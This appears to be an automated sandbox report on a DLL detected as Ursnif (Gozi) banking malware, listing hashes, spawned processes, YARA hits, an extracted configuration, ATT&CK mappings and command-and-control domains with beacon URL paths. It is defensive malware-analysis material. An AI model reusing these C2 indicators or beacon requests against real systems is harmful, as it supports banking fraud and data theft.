Play interactive tour

Edit tour

Analysis Report zQ32b1FVcL.dll

Overview

General Information

Sample Name:	zQ32b1FVcL.dll
Analysis ID:	338663
MD5:	eed4174c8a96dd7b611d9f109c71e20f
SHA1:	c471724d86fd269a19932280361ca52e1e294f19
SHA256:	e5dc940537146c1c56b8a8f91234484c83223943c13d2fbf354f0cfdec13c258
Tags:	dllGozi
Most interesting Screenshot:

Detection

Ursnif

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Writes or reads registry keys via WMI

Writes registry values via WMI

Antivirus or Machine Learning detection for unpacked file

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Detected potential crypto function

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

PE file contains strange resources

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6132 cmdline: loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)

iexplore.exe (PID: 6388 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6496 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 1140 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4144 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3288 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6620 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 3984 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6772 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: loaddll32.exe PID: 6132	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 5 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: loaddll32.exe.6132.1.memstr

Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@320946", "dns": "320946", "version": "250171", "uptime": "266", "crc": "1", "id": "5533", "user": "253fc4ee08f8d2d8cdc8873aab08ddd5", "soft": "2"}

Source: 1.2.loaddll32.exe.cc0000.2.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.2.loaddll32.exe.10000000.4.unpack	Avira: Label: TR/Crypt.XPACK.Gen8

Source: zQ32b1FVcL.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF523C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,

Source: global traffic	HTTP traffic detected: GET /images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9mxw/6WnzZpVL425M/CKmLBjBrvSn/f81OVwTXuZJrQZ/ja96eHVtqviz347i3JPx7/5Q6Nnj7RuUGPOFSU/4_2BMMGnBKrRLtO/P_2FyE_2BfezXukLEe/1gUCCjKEM/NO_2BQ8BNJkX/Zge.avi HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: begoventa.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: begoventa.topConnection: Keep-Alive

Source: msapplication.xml0.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x483571cf,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.16.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x483571cf,0x01d6e951</date><accdate>0x4837d4a4,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: babidone.top

Source: {8CB598BC-5544-11EB-90E4-ECF4BB862DED}.dat.24.dr	String found in binary or memory: http://babidone.top/images/tA_2BVY2gpEVQoau7_/2F_2Fif0j/qHSdUWFKPJWkX50svEcy/JM_2Bha3oNIg2DGHFKu/s3R
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQd
Source: {B10F0CC6-5544-11EB-90E4-ECF4BB862DED}.dat.34.dr	String found in binary or memory: http://begoventa.top/images/FYBARzKsgpw7r/GeKZtzzc/xoDGsIA1G8WlOKnsrCv_2F5/ejqDaRsnD5/ZD4RH6oQdxqfB9
Source: zQ32b1FVcL.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: zQ32b1FVcL.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: zQ32b1FVcL.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.16.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.16.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.16.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.16.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.16.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.16.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.16.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.16.dr	String found in binary or memory: http://www.youtube.com/
Source: loaddll32.exe, 00000001.00000002.589354244.000000000050B000.00000004.00000020.sdmp	String found in binary or memory: https://babidone.top/images/SD1b2IxKgGl/yu82lOMR21XtBT/D978a7t2zaVGKWj8Jhn4X/WcqZuBMBlmeeUEpv/9Sv89p
Source: zQ32b1FVcL.dll	String found in binary or memory: https://sectigo.com/CPS0D

Source: unknown

Network traffic detected: HTTP traffic on port 49754 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10001812 NtMapViewOfSection,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10001DD0 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100022E5 NtQueryVirtualMemory,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CF9932 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFB2C1 NtQueryVirtualMemory,

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100020C4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFB09C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFEC48
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFEC41
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CF99FC

Source: zQ32b1FVcL.dll

Static PE information: invalid certificate

Source: zQ32b1FVcL.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: zQ32b1FVcL.dll

Binary or memory string: OriginalFilename360SkinView.exeF vs zQ32b1FVcL.dll

Source: zQ32b1FVcL.dll

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED

Source: classification engine

Classification label: mal64.troj.winDLL@13/44@4/3

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF244A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD53763C3DA639732.TMP

Jump to behavior

Source: zQ32b1FVcL.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\zQ32b1FVcL.dll'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6388 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1140 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3288 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3984 CREDAT:17410 /prefetch:2

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Source: zQ32b1FVcL.dll

Static PE information: section name: .data2

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_100020B3 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_10002060 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFACD0 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CFB08B push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C81830 push edx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C644CE push edx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C611C0 push eax; iretd
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C615D6 push ecx; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63DFA push ecx; retf
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C65116 pushad ; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63E99 push FFFFFFCFh; retf
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63A4D push 92BB463Fh; iretd
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C643F7 push ss; ret
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C63F02 push dword ptr [edi+64h]; iretd

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\loaddll32.exe

Source: loaddll32.exe, 00000001.00000002.589296510.00000000004F9000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAWH

Source: C:\Windows\System32\loaddll32.exe

Memory protected: page execute read | page guard

Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.590862827.0000000001260000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF5DC6 cpuid

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_100019C7 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_00CF5DC6 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_10001799 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.303180413.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303205645.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302945060.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303072523.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303036485.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.302845992.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.591350377.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303010833.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.303117277.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection2	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Security Software Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.loaddll32.exe.cf0000.3.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
1.2.loaddll32.exe.cc0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
1.2.loaddll32.exe.10000000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File

Domains

Source	Detection	Scanner	Label	Link
begoventa.top	2%	Virustotal		Browse
babidone.top	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
